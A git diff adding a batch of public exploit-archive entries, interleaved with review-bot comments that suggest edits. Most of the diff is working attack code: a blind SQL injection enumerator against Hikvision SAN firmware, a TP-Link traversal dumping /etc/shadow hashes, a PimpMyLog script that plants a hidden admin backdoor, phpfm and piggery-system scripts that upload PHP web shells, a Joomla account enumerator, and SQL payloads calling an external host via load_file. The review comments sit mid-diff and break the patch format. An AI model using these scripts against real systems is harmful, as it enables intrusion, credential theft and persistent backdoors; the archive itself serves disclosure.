diff --git a/exploits/hardware/remote/51607.py b/exploits/hardware/remote/51607.py
new file mode 100755
index 000000000..653c89597
--- /dev/null
+++ b/exploits/hardware/remote/51607.py
@@ -0,0 +1,101 @@ +# Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution +# Date: 16 July 2023 +# Exploit Author: Thurein Soe +# CVE : CVE-2022-28171 +# Vendor Homepage: https://www.hikvision.com +# Software Link: N/A +# Refence Link: https://cve.report/CVE-2022-28171 +# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s +''' +Vendor Description: + +Hikvision is a world-leading surveillance manufacturer and supplier of +video surveillance and Internet of Things (IoT) equipment for civilian and +military purposes. +Some Hikvision Hybrid SAN products were vulnerable to multiple remote code +execution vulnerabilities such as command injection, Blind SQL injection, +HTTP request smuggling, and reflected cross-site scripting. +This resulted in remote code execution that allows an adversary to execute +arbitrary operating system commands and more. However, an adversary must be +on the same network to leverage this vulnerability to execute arbitrary +commands. + +Vulnerability description: +A manual test confirmed that The download type parameter was vulnerable to +Blind SQL injection.I created a Python script to automate and enumerate SQL +versions as the Application was behind the firewall and block all the +requests from SQLmap. 
+ +Request Body: +GET +/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' +HTTP/1.1 +Host: X.X.X.X.12:2004 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 +Connection: close + +POC: +''' +import requests +import time + +url = "http://X.X.X.X:2004/web/log/dynamic_log.php" + +# Function to check if the response time is greater than the specified delay +def is_response_time_delayed(response_time, delay): + return response_time >= delay + +# Function to perform blind SQL injection and check the response time +def perform_blind_sql_injection(payload): + proxies = { + 'http': 'http://localhost:8080', + 'https': 'http://localhost:8080', + } + + params = { + 'target': 'makeMaintainLog', + 'downloadtype': payload + } + headers = { + 'Accept-Encoding': 'gzip, deflate', + 'Accept': '*/*', + 'Accept-Language': 'en', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36', + 'Connection': 'close' + } + + start_time = time.time() + response = requests.get(url, headers=headers, params=params, +proxies=proxies) + end_time = time.time() + + response_time = end_time - start_time + return is_response_time_delayed(response_time, 20) + +# Enumerate the MySQL version +def enumerate_mysql_version(): + version_Name = '' + sleep_time = 10 # Sleep time is 10 seconds + + payloads = [ + f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid}, +SLEEP({sleep_time}), 0))-- -" + for i in range(1, 11) + for mid in range(256) + ] + + for payload in payloads: + if perform_blind_sql_injection(payload): + mid = payload.split("=")[-1].split(",")[0] + version_Name += chr(int(mid)) + + return version_Name + +# Enumeration is completed +version_Name = enumerate_mysql_version() +print("MySQL version is:", version_Name) \ No newline at 
end of file diff --git a/exploits/hardware/webapps/51603.py b/exploits/hardware/webapps/51603.py new file mode 100755 index 000000000..9b5dc29ed --- /dev/null +++ b/exploits/hardware/webapps/51603.py @@ -0,0 +1,42 @@ +# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information +# Date: 2023-03-31 +# Exploit Author: Paul Smith +# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series +# Version: ABB Flow-X all versions before V4.00 +# Tested on: Kali Linux +# CVE: CVE-2023-1258 + + +#!/usr/bin/python +import sys +import re +from bs4 import BeautifulSoup as BS +import lxml +import requests + +# Set the request parameter +url = sys.argv[1] + + +def dump_users(): + response = requests.get(url) + + # Check for HTTP codes other than 200 + if response.status_code != 200: + print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text) + exit() + + # Decode the xml response into dictionary and use the data + data = response.text + soup = BS(data, features="xml") + logs = soup.find_all("log") + for log in logs: + test = re.search('User (.*?) logged in',str(log)) + if test: + print(test.group(0)) +def main(): + dump_users() + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/51606.txt b/exploits/hardware/webapps/51606.txt new file mode 100644 index 000000000..85e647ae4 --- /dev/null +++ b/exploits/hardware/webapps/51606.txt 
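Review bot: In 51607.py the `# Version:` header line opens with "Filmora 12:", an unrelated product name, and then repeats several Ds-a7xxxx models, so it cannot be used to decide whether a device is in scope for CVE-2022-28171. I would replace it with a deduplicated list, e.g. `# Version: Hikvision Hybrid SAN firmware: Ds-a71024, Ds-a71048, Ds-a71048r-cvs, Ds-a71072r, ...`, and correct `Refence Link` to `Reference Link`. The title says "Multiple Remote Code Execution" while the docstring and the script cover only a blind SQL injection in the `downloadtype` parameter, and the header should say so. Separately, `requests.get(...)` in `perform_blind_sql_injection` has no `timeout=`, and the `proxies` dict is hard-coded to `localhost:8080` without a comment saying it assumes a local intercepting proxy.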
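Review bot: The header of 51603.py contradicts itself on the affected range: the title names "ABB FlowX v4.00" while `# Version:` says "all versions before V4.00", which reads as v4.00 being the fixed release, so the title should be aligned with the version line for anyone patching against CVE-2023-1258. In the code, `#!/usr/bin/python` sits below the comment header where it has no effect, `import lxml` is never referenced by name (it appears to be needed only as the backend for `features="xml"`, which deserves a comment), and `requests.get(url)` in `dump_users` has no timeout. Suggested lines: `response = requests.get(url, timeout=10)` and `sys.exit(1)` in place of the bare `exit()` on the non-200 path.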
@@ -0,0 +1,56 @@ +# Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal +# Date: 13/7/2023 +# Exploit Author: Anish Feroz (Zeroxinn) +# Vendor Homepage: http://www.tp-link.com +# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n +# Tested on: TP-Link TL-WR740N + +---------------------------POC--------------------------- + +Request +------- + +GET /help/../../../etc/shadow HTTP/1.1 +Host: 192.168.0.1:8082 +Authorization: Basic YWRtaW46YWRtaW4= +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +Response +-------- + +HTTP/1.1 200 OK +Server: Router Webserver +Connection: close +WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" +Content-Type: text/html + + + +TL-WR740N + + + + +root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: +Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: +bin::10933:0:99999:7::: +daemon::10933:0:99999:7::: +adm::10933:0:99999:7::: +lp:*:10933:0:99999:7::: +sync:*:10933:0:99999:7::: +shutdown:*:10933:0:99999:7::: +halt:*:10933:0:99999:7::: +uucp:*:10933:0:99999:7::: +operator:*:10933:0:99999:7::: +nobody::10933:0:99999:7::: +ap71::10933:0:99999:7::: \ No newline at end of file diff --git a/exploits/multiple/local/51571.txt b/exploits/multiple/local/51571.txt new file mode 100644 index 000000000..61bc1d7c8 --- /dev/null +++ b/exploits/multiple/local/51571.txt 
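Review bot: The response body in 51606.txt reproduces the device's shadow entries for `root` and `Admin` verbatim, including the `$1$` (MD5-crypt) hash strings; the hash field can be replaced with a placeholder such as `root:<hash redacted>:10933:0:99999:7:::` without weakening the evidence that the file was read. The request carries `Authorization: Basic YWRtaW46YWRtaW4=`, which is the base64 form of `admin:admin`, so "Authenticated" in the title means the default credentials, and the header should state that explicitly. The title should read "Directory Traversal" rather than "Transversal", and the header has no CVE, fixed-firmware or mitigation line.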
@@ -0,0 +1,52 @@ +## Title:Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure +## Author: nu11secur1ty +## Date: 07.06.2023 +## Vendor: https://www.microsoft.com/ +## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415 +## Reference: https://portswigger.net/web-security/information-disclosure, +https://www.softwaresecured.com/stride-threat-modeling/ +## CVE-2023-33145 + + + +## Description: +The type of information that could be disclosed if an attacker +successfully exploited this vulnerability is data inside the targeted +website like IDs, tokens, nonces, cookies, IP, User-Agent, and other +sensitive information. +The user would have to click on a specially crafted URL to be +compromised by the attacker. +In this example, the attacker use STRIDE Threat Modeling to spoof the +victim to click on his website and done. +This will be hard to detect. + +## Conclusion: +Please be careful, for suspicious sites or be careful who sending you +an link to open! + +## Staus: HIGH Vulnerability + +[+]Exploit: + +- Exploit Server: + +```js +## This is a Get request from the server when the victims click! And +it is enough to understand this vulnerability! =) + + + +## WARNING: The PoCsess.php will be not uploaded for security reasons! +## BR nu11secur1ty + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146) + +## Proof and Exploit +[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html) + +## Time spend: +01:30:00 \ No newline at end of file diff --git a/exploits/php/webapps/51197.txt b/exploits/php/webapps/51197.txt new file mode 100644 index 000000000..af245d9fd --- /dev/null +++ b/exploits/php/webapps/51197.txt 
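Review bot: The identifiers in 51571.txt do not agree: the header and the "Proof and Exploit" link say CVE-2023-33145, but the "Reproduce" link points to a `CVE-2023-33146` directory, so one of the two is wrong and should be corrected before the entry is mapped to a patch. The fenced `js` block holds only two comment lines in this rendering, so the "Exploit Server" section documents nothing that could be turned into a detection; either show the logged GET request or drop the section. `## Staus:` should be `## Status:`, and the description would be more useful with the fixed Edge build stated next to the affected one.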
@@ -0,0 +1,54 @@ +# Exploit Title: PMB 7.4.6 - SQL Injection +# Google Dork: inurl:opac_css +# Date: 2023-01-06 +# Exploit Author: str0xo DZ (Walid Ben) https://github.com/Str0xo +# Vendor Homepage: http://www.sigb.net +# Software Link: http://forge.sigb.net/redmine/projects/pmb/files +# Affected versions : <= 7.4.6 + +-==== Software Description ====- + +PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. +We are some librarians, users and developers deploring this state of affairs. + +PMB is based on web technology. This is what we sometimes call a 'web-app'. +PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language. + +The main functions of PMB are : + + * Supporting the UNIMARC format + * Authorities management (authors, publishers, series, subjects...) + * Management of loans, holds, borrowers... + * A user-friendly configuration + * The ability to import full bibliographic records + * A user-friendly OPAC integrating a browser + * Loans management with a module designed to serve even the very small establishments + * Serials management + * Simple administration procedures that can be handled easily even by the library staff... 
+ +-==== Vulnerability ====- + +URL: + https://localhost/opac_css/ajax.php?categ=storage&datetime=undefined&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined + +Parameter: + id + +-==== Vulnerability Details ====- + +URL encoded GET input id was set to if(now()=sysdate(),sleep(6),0) + +Tests performed: + + if(now()=sysdate(),sleep(15),0) => 15.43 + if(now()=sysdate(),sleep(6),0) => 6.445 + if(now()=sysdate(),sleep(15),0) => 15.421 + if(now()=sysdate(),sleep(3),0) => 3.409 + if(now()=sysdate(),sleep(0),0) => 0.415 + if(now()=sysdate(),sleep(0),0) => 0.413 + if(now()=sysdate(),sleep(6),0) => 6.41 + +Using SQLMAP : + + +sqlmap -u "http://localhost/pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1&module=ajax&sub=save&token=undefined" -p "id" \ No newline at end of file diff --git a/exploits/php/webapps/51593.py b/exploits/php/webapps/51593.py new file mode 100755 index 000000000..8ad4c9ff3 --- /dev/null +++ b/exploits/php/webapps/51593.py 
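Review bot: The two example URLs in 51197.txt use different paths for the same endpoint, `https://localhost/opac_css/ajax.php` in the Vulnerability section and `http://localhost/pmb/opac_css/ajax.php` in the sqlmap line, so it is unclear whether the `/pmb/` prefix is part of a default install; one form should be used throughout. The write-up names the injectable parameter (`id`) but gives no remediation; a closing line such as `Mitigation: cast id to an integer or bind it in a prepared statement; upgrade to a release later than 7.4.6` would make the entry actionable, with the fixed version filled in once confirmed.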
@@ -0,0 +1,69 @@ +# Exploit Title: PimpMyLog v1.7.14 - Improper access control +# Date: 2023-07-10 +# Exploit Author: thoughtfault +# Vendor Homepage: https://www.pimpmylog.com/ +# Software Link: https://github.com/potsky/PimpMyLog +# Version: 1.5.2-1.7.14 +# Tested on: Ubuntu 22.04 +# CVE : N/A +# Description: PimpMyLog suffers from improper access control on the account creation endpoint, allowing a remote attacker to create an admin account without any existing permissions. The username is not sanitized and can be leveraged as a vector for stored XSS. This allows the attacker to hide the presence of the backdoor account from legitimate admins. Depending on the previous configuration, an attacker may be able to view sensitive information in apache, iis, nginx, and/or php logs. The attacker can view server-side environmental variables through the debug feature, which may include passwords or api keys. +import requests +import argparse +from base64 import b64encode + +js = """var table = document.getElementById("userlisttable"); +var rows = table.getElementsByTagName("tr"); +for (var i = 0; i < rows.length; i++) { + var cells = rows[i].getElementsByTagName("td"); + for (var j = 0; j < cells.length; j++) { + var anchors = cells[j].getElementsByTagName("a"); + for (var k = 0; k < anchors.length; k++) { + if ( + anchors[k].innerText === "{}" || + anchors[k].innerText.includes("atob(") || + anchors[k].querySelector("script") !== null + ) { + rows[i].parentNode.removeChild(rows[i]); + } + } + } +} +var userCountElement = document.querySelector('.lead'); +var userCountText = userCountElement.textContent; +var userCount = parseInt(userCountText); +if(!isNaN(userCount)){ + userCount--; + userCountElement.textContent = userCount + ' Users'; +}""" + +payload = "" + + +def backdoor(url, username, password): + config_url = url + '/inc/configure.php' + + print("[*] Creating admin account...") + r = requests.post(config_url, data={'s':'authsave', 'u': username, 'p': password}) + 
if r.status_code != 200: + print("[!] An error occured") + return + + print("[*] Hiding admin account...") + base64_js = b64encode(js.format(username).encode()).decode() + xss_payload = payload.format(base64_js) + + r = requests.post(config_url, data={'s':'authsave', 'u': xss_payload, 'p': password}) + if r.status_code != 200: + print("[!] An error occured") + return + + + print("[*] Exploit finished!") + +parser = argparse.ArgumentParser() +parser.add_argument('--url', help='The base url of the target', required=True) +parser.add_argument('--username', default='backdoor', help='The username of the backdoor account') +parser.add_argument('--password', default='backdoor', help='The password of the backdoor account') +args = parser.parse_args() + +backdoor(args.url.rstrip('/'), args.username, args.password) \ No newline at end of file diff --git a/exploits/php/webapps/51594.py b/exploits/php/webapps/51594.py new file mode 100755 index 000000000..d06f1c255 --- /dev/null +++ b/exploits/php/webapps/51594.py 
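Review bot: `--username` and `--password` in 51593.py both default to `backdoor`, so any run of `backdoor()` without arguments leaves an admin account with publicly known credentials on the system under test. I would make the password mandatory, `parser.add_argument('--password', required=True, help='The password of the test account')`, and add a header comment stating that the script creates two persistent accounts through `/inc/configure.php` with `s=authsave` and that both must be removed after the test. The description gives no fixed version or mitigation; it should also say that unauthenticated POSTs to `inc/configure.php` are what an operator would look for in access logs. Both `requests.post` calls lack `timeout=`.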
@@ -0,0 +1,39 @@ +# Exploit Title: phpfm v1.7.9 - Authentication type juggling +# Date: 2023-07-10 +# Exploit Author: thoughtfault +# Vendor Homepage: https://www.dulldusk.com/phpfm/ +# Software Link: https://github.com/dulldusk/phpfm/ +# Version: 1.6.1-1.7.9 +# Tested on: Ubuntu 22.04 +# CVE : N/A +""" +An authentication bypass exists in when the hash of the password selected by the user incidently begins with 0e, 00e, and in some PHP versions, 0x. This is because loose type comparision is performed between the password hash and the loggedon value, which by default for an unauthenticated user is 0 and can additionally be controlled by the attacker. This allows an attacker to bypass the login and obtain remote code execution. + +A list of vulnerable password hashes can be found here. +https://github.com/spaze/hashes/blob/master/md5.md +""" +import requests +import sys + +if len(sys.argv) < 2: + print(f"[*] Syntax: ./{__file__} http://target/") + sys.exit(0) + + +url = sys.argv[1].rstrip('/') + "/index.php" + +payload_name = "shell.php" +payload = '' +payload_url = url.replace("index.php", payload_name) + +headers = {"Accept-Language": "en-US,en;q=0.5", "Cookie": "loggedon=0"} +files = {"dir_dest": (None, "/srv/http/"), "action": (None, "10"), "upfiles[]": ("shell.php", payload) } + +requests.post(url, headers=headers, files=files) + +r = requests.get(payload_url) +if r.status_code == 200: + print(f"[*] Exploit sucessfull: {payload_url}") + print(r.text) +else: + print(f"[*] Exploit might have failed, payload url returned a non-200 status code of: {r.status_code}" ) \ No newline at end of file diff --git a/exploits/php/webapps/51595.py b/exploits/php/webapps/51595.py new file mode 100755 index 000000000..a7437cbd2 --- /dev/null +++ b/exploits/php/webapps/51595.py 
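Review bot: The docstring in 51594.py explains the cause (a loose comparison between the password hash and the `loggedon` value) but not the remedy, and its first sentence is garbled ("exists in when", "incidently", "comparision"). Suggested wording: `An authentication bypass exists when the hash of the configured password happens to begin with 0e, 00e or, in some PHP versions, 0x.` followed by `Mitigation: compare with hash_equals() or ===, never ==.` In the code, the usage branch ends with `sys.exit(0)`, which reports success to a calling shell; `sys.exit(1)` is the conventional status there. The script writes `shell.php` under `/srv/http/` and has neither a cleanup step nor a comment saying the file is left behind.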
@@ -0,0 +1,100 @@ +# Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration) +# Google Dork: inurl:"index.php?option=com_booking" +# Date: 07/12/2023 +# Exploit Author: qw3rTyTy +# Vendor Homepage: http://www.artio.net/ +# Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download +# Version: 2.4.9 +# Tested on: Slackware/Nginx/Joomla! 3.10.11 +# +## +# File: site/booking.php +# +# execute(JRequest::getVar('task')); +#108 $controller->redirect(); +#109 } +# [...] +# +# File: admin/controllers/customer.php +# +# $user->name, 'username' => $user->username, 'email' => $user->email); +#243 die(json_encode($data)); +#244 } +# [...] +# +# A following GET request is equivalent to doing a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'. +# +# curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123 +# +# So, an attacker can easily enumerate all accounts by bruteforcing. 
+# +## +import argparse +import urllib.parse +import requests +from sys import exit +from time import sleep + +def enumerateAccounts(options): + i = 1 + url = options.url + url = url + "/index.php?option=com_booking&controller=customer&task=getUserData&id=" + + while True: + try: + response = requests.get("{}{}".format(url, str(i))) + + if response.status_code == 200: + try: + jsondocument = response.json() + if jsondocument["name"] != None: + print(jsondocument) + except requests.exceptions.JSONDecodeError: + raise + else: + break + except Exception as ex: + print(ex) + break + + i += 1 + +def main(): + p = argparse.ArgumentParser() + p.add_argument("-u", "--url", type=str, required=True) + parsed = p.parse_args() + + try: + t = urllib.parse.urlparse(parsed.url) + except ValueError as ex: + print(ex) + exit() + + if not t[0].startswith("http") and not t[0].startswith("https"): + print("Improper URL given.") + exit() + + if len(t[1]) == 0: + print("Improper URL given.") + exit() + + enumerateAccounts(parsed) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/51596.txt b/exploits/php/webapps/51596.txt new file mode 100644 index 000000000..d5a3b8fa0 --- /dev/null +++ b/exploits/php/webapps/51596.txt 
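Review bot: The scheme check in `main()` of 51595.py, `if not t[0].startswith("http") and not t[0].startswith("https")`, is a prefix test, so its second clause is redundant and any scheme that merely begins with "http" passes; `if t.scheme not in ("http", "https"):` states what is meant. In `enumerateAccounts`, `except requests.exceptions.JSONDecodeError: raise` is a no-op wrapper, `!= None` should be `is not None`, and `sleep` is imported but never used, so the `while True` loop sends requests with no delay and no `timeout=`. The comment header quotes `admin/controllers/customer.php` returning `name`, `username` and `email` through `die(json_encode($data))`; a final line naming the fix, presumably an authorisation check before `getUserData` runs, would complete it.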
@@ -0,0 +1,65 @@ +## Title: Vaidya-Mitra 1.0 - Multiple SQLi +## Author: nu11secur1ty +## Date: 07.12.2023 +## Vendor: https://mayurik.com/ +## Software: free: +https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html, +https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php +## Reference: https://portswigger.net/web-security/sql-injection + +## Description: +The `useremail` parameter appears to be vulnerable to SQL injection +attacks. The payload '+(select +load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+' +was submitted in the useremail parameter. This payload injects a SQL +sub-query that calls MySQL's load_file function with a UNC file path +that references a URL on an external domain. The application +interacted with that domain, indicating that the injected SQL query +was executed. The attacker easily can steal all information from this +system, like +login credentials, phone numbers and etc. + +STATUS: HIGH Vulnerability + +[+]Payload: +```mysql +--- +Parameter: useremail (POST) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY +or GROUP BY clause + Payload: useremail=mayuri.infospace@gmail.com'+(select +load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' +RLIKE (SELECT (CASE WHEN (5532=5532) THEN +0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select +load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+'' +ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or +GROUP BY clause (FLOOR) + Payload: useremail=mayuri.infospace@gmail.com'+(select +load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' +AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT 
+(ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND +'gHln'='gHln&userpassword=rootadmin + + Type: time-based blind + Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) + Payload: useremail=mayuri.infospace@gmail.com'+(select +load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' +OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND +'ZWBa'='ZWBa&userpassword=rootadmin +--- + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html) + +## Time spend: +00:27:00 \ No newline at end of file diff --git a/exploits/php/webapps/51597.txt b/exploits/php/webapps/51597.txt new file mode 100644 index 000000000..e0aca73a4 --- /dev/null +++ b/exploits/php/webapps/51597.txt 
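Review bot: The payloads in 51596.txt disagree about the external host: the readable `load_file(...)` form names `tupaputka.com`, while the hex literal in the boolean-based payload decodes to the same label under `oastify.com`, so the plain-text host appears to have been edited after capture. The description should say the host is a placeholder, or the two forms should match. The payload lines also carry what looks like a real mailbox address and `userpassword=rootadmin`, which can be replaced with example values. The description stops at impact; one sentence saying that `useremail` must be bound as a parameter in a prepared statement would supply the remediation.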
@@ -0,0 +1,124 @@ +#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) +#Application: Backdrop Cms +#Version: v1.25.1 +#Bugs: Stored Xss +#Technology: PHP +#Vendor URL: https://backdropcms.org/ +#Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip +#Date of found: 12-07-2023 +#Author: Mirabbas Ağalarov +#Tested on: Linux + +2. Technical Details & POC +======================================== + +1. login to account +2. go to http://localhost/backdrop/?q=admin/config/system/site-information +3. upload svg file + +""" + + + + + + + +""" +4. go to svg file (http://localhost/backdrop/files/malas_2.svg) + + +Request + +POST /backdrop/?q=admin/config/system/site-information HTTP/1.1 +Host: localhost +Content-Length: 2116 +Cache-Control: max-age=0 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/backdrop/?q=admin/config/system/site-information +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E +Connection: close + +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="site_name" + +My Backdrop Site +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="site_slogan" + + +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="site_mail" + +admin@admin.com +------WebKitFormBoundaryVXWRsHHM3TVjALpg 
+Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg" +Content-Type: image/svg+xml + + + + + + + + + +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="site_logo_path" + + +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="files[site_favicon_upload]"; filename="" +Content-Type: application/octet-stream + + +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="site_favicon_path" + +core/misc/favicon.ico +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="site_frontpage" + +home +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="site_403" + + +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="site_404" + + +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="form_build_id" + +form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="form_token" + +siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40 +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="form_id" + +system_site_information_settings +------WebKitFormBoundaryVXWRsHHM3TVjALpg +Content-Disposition: form-data; name="op" + +Save configuration +------WebKitForm \ No newline at end of file diff --git a/exploits/php/webapps/51598.sh b/exploits/php/webapps/51598.sh new file mode 100755 index 000000000..eb48a9819 --- /dev/null +++ b/exploits/php/webapps/51598.sh 
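Review bot: The request dump in 51597.txt includes a complete `Cookie: SESS31b3...` session value together with `form_build_id` and `form_token`, and the `Cookie:` headers in 51599.txt and 51601.txt later in this commit have the same problem; none of these values is needed to understand the issue, so they should be replaced with placeholders such as `Cookie: SESS<id>=<redacted>`. The file starts at section "2." with no section 1, and the block between the two `"""` markers under step 3 is empty in this rendering, so the write-up does not show what the SVG contained. The header should state the precondition visible in the steps (an account allowed to edit site information) and a mitigation, for example sanitising SVG on upload or serving uploaded SVG with `Content-Disposition: attachment`.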
@@ -0,0 +1,53 @@ +#!/bin/bash +# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability +# Date: July 12 2023 +# Exploit Author: 1337kid +# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html +# Version: 1.0 +# Tested on: Ubuntu +# CVE : CVE-2023-37629 +# +# chmod +x exploit.sh +# ./exploit.sh web_url +# ./exploit.sh http://127.0.0.1:8080/ + +echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ " +echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\" +echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /" +echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ " +echo " @1337kid" +echo + +if [[ $1 == '' ]]; then + echo "No URL specified!" + exit +fi + +base_url=$1 + +unauth_file_upload() { + # CVE-2023-37629 - File upload vuln + echo "Generating shell.php" +#=========== +cat > shell.php << EOF + +EOF +#=========== + echo "done" + curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null + req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}') + if [[ $req == "200" ]]; then + echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php" + else + echo "Failed to upload a shell" + fi + +} + +req=$(curl -I -s $base_url | head -1 | awk '{print $2}') +if [[ $req -eq "200" ]]; then + unauth_file_upload +else + echo "Error" + echo "Status Code: $req" +fi \ No newline at end of file diff --git a/exploits/php/webapps/51599.txt b/exploits/php/webapps/51599.txt new file mode 100644 index 000000000..b39dfc5ca --- /dev/null +++ b/exploits/php/webapps/51599.txt 
